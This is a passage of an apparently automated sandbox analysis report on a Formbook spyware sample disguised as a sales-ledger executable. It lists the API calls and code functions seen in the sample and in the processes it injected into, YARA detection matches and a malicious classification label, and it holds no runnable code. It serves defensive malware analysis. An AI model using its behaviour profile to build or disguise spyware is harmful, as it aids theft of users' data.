                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09560 NtWriteFile,LdrInitializeThunk,32_2_04D09560
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D096D0 NtCreateKey,LdrInitializeThunk,32_2_04D096D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D096E0 NtFreeVirtualMemory,LdrInitializeThunk,32_2_04D096E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09650 NtQueryValueKey,LdrInitializeThunk,32_2_04D09650
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09660 NtAllocateVirtualMemory,LdrInitializeThunk,32_2_04D09660
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09610 NtEnumerateValueKey,LdrInitializeThunk,32_2_04D09610
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09FE0 NtCreateMutant,LdrInitializeThunk,32_2_04D09FE0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09780 NtMapViewOfSection,LdrInitializeThunk,32_2_04D09780
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09770 NtSetInformationFile,LdrInitializeThunk,32_2_04D09770
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09710 NtQueryInformationToken,LdrInitializeThunk,32_2_04D09710
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09840 NtDelayExecution,LdrInitializeThunk,32_2_04D09840
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09860 NtQuerySystemInformation,LdrInitializeThunk,32_2_04D09860
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D099A0 NtCreateSection,LdrInitializeThunk,32_2_04D099A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,32_2_04D09910
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09A50 NtCreateFile,LdrInitializeThunk,32_2_04D09A50
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D095F0 NtQueryInformationFile,32_2_04D095F0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D0AD30 NtSetContextThread,32_2_04D0AD30
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09520 NtWaitForSingleObject,32_2_04D09520
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09670 NtQueryInformationProcess,32_2_04D09670
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D097A0 NtUnmapViewOfSection,32_2_04D097A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D0A770 NtOpenThread,32_2_04D0A770
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09760 NtOpenProcess,32_2_04D09760
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D0A710 NtOpenProcessToken,32_2_04D0A710
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09730 NtQueryVirtualMemory,32_2_04D09730
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D098F0 NtReadVirtualMemory,32_2_04D098F0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D098A0 NtWriteVirtualMemory,32_2_04D098A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D0B040 NtSuspendThread,32_2_04D0B040
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09820 NtEnumerateKey,32_2_04D09820
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D099D0 NtCreateProcessEx,32_2_04D099D0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09950 NtQueueApcThread,32_2_04D09950
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09A80 NtOpenDirectoryObject,32_2_04D09A80
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09A10 NtQuerySection,32_2_04D09A10
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09A00 NtProtectVirtualMemory,32_2_04D09A00
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09A20 NtResumeThread,32_2_04D09A20
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D0A3B0 NtGetContextThread,32_2_04D0A3B0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D09B00 NtSetValueKey,32_2_04D09B00
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2A070 NtClose,32_2_02B2A070
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2A120 NtAllocateVirtualMemory,32_2_02B2A120
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B29FF0 NtReadFile,32_2_02B29FF0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B29F40 NtCreateFile,32_2_02B29F40
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2A06C NtClose,32_2_02B2A06C
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2A11A NtAllocateVirtualMemory,32_2_02B2A11A
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_0057A5EC0_2_0057A5EC
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_010606400_2_01060640
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_010609AE0_2_010609AE
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_010617480_2_01061748
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_01061BE00_2_01061BE0
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_010617F90_2_010617F9
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E200B80_2_04E200B8
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E20E600_2_04E20E60
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeCode function: 0_2_04E20E700_2_04E20E70
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0040103024_2_00401030
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D90524_2_0041D905
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041EB3724_2_0041EB37
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041E3A224_2_0041E3A2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041E41B24_2_0041E41B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041D4D024_2_0041D4D0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041DCBC24_2_0041DCBC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00402D9024_2_00402D90
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00409E4024_2_00409E40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00409E3E24_2_00409E3E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041DF3F24_2_0041DF3F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0041DFCD24_2_0041DFCD
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_00402FB024_2_00402FB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0078A5EC24_2_0078A5EC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121412024_2_01214120
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FF90024_2_011FF900
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012CE82424_2_012CE824
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B100224_2_012B1002
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012220A024_2_012220A0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C20A824_2_012C20A8
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120B09024_2_0120B090
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C28EC24_2_012C28EC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C2B2824_2_012C2B28
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AB4024_2_0121AB40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122EBB024_2_0122EBB0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B03DA24_2_012B03DA
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BDBD224_2_012BDBD2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AFA2B24_2_012AFA2B
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C22AE24_2_012C22AE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C2D0724_2_012C2D07
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F0D2024_2_011F0D20
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C1D5524_2_012C1D55
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122258124_2_01222581
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120D5E024_2_0120D5E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C25DD24_2_012C25DD
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120841F24_2_0120841F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BD46624_2_012BD466
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C1FF124_2_012C1FF1
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012CDFCE24_2_012CDFCE
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01216E3024_2_01216E30
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BD61624_2_012BD616
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C2EF724_2_012C2EF7
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C5A7225_2_061C5A72
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C8ABB25_2_061C8ABB
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C0B2025_2_061C0B20
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C0B2225_2_061C0B22
                  Source: C:\Windows\explorer.exeCode function: 25_2_061BC07225_2_061BC072
                  Source: C:\Windows\explorer.exeCode function: 25_2_061BC06D25_2_061BC06D
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C488225_2_061C4882
                  Source: C:\Windows\explorer.exeCode function: 25_2_061BDCF225_2_061BDCF2
                  Source: C:\Windows\explorer.exeCode function: 25_2_061BDCF025_2_061BDCF0
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C315225_2_061C3152
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8D46632_2_04D8D466
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD841F32_2_04CD841F
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D925DD32_2_04D925DD
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDD5E032_2_04CDD5E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF258132_2_04CF2581
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D91D5532_2_04D91D55
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D92D0732_2_04D92D07
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC0D2032_2_04CC0D20
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D92EF732_2_04D92EF7
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8D61632_2_04D8D616
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE6E3032_2_04CE6E30
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9DFCE32_2_04D9DFCE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D91FF132_2_04D91FF1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D928EC32_2_04D928EC
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDB09032_2_04CDB090
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF20A032_2_04CF20A0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D920A832_2_04D920A8
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8100232_2_04D81002
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9E82432_2_04D9E824
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEA83032_2_04CEA830
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE99BF32_2_04CE99BF
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCF90032_2_04CCF900
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE412032_2_04CE4120
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D922AE32_2_04D922AE
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D7FA2B32_2_04D7FA2B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D803DA32_2_04D803DA
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8DBD232_2_04D8DBD2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFEBB032_2_04CFEBB0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAB4032_2_04CEAB40
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D92B2832_2_04D92B28
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2E3A232_2_02B2E3A2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2EB3732_2_02B2EB37
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B19E3E32_2_02B19E3E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B19E4032_2_02B19E40
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B12FB032_2_02B12FB0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B2E41B32_2_02B2E41B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_02B12D9032_2_02B12D90
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: String function: 011FB150 appears 48 times
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04CCB150 appears 66 times
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314971887.00000000029BF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324334005.00000000076A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSycdovrq.dll" vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.313244216.0000000000598000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.323803137.00000000074B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000000.311950591.00000000007A8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375859659.000000000147F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378517009.0000000001659000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exeBinary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Require your Sales Ledger from 01-April-2020.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/14@2/1
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,9_2_00408FC9
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,13_2_00408FC9
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,9_2_004095FD
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040A33B
                  Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_00401306
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeJump to behavior
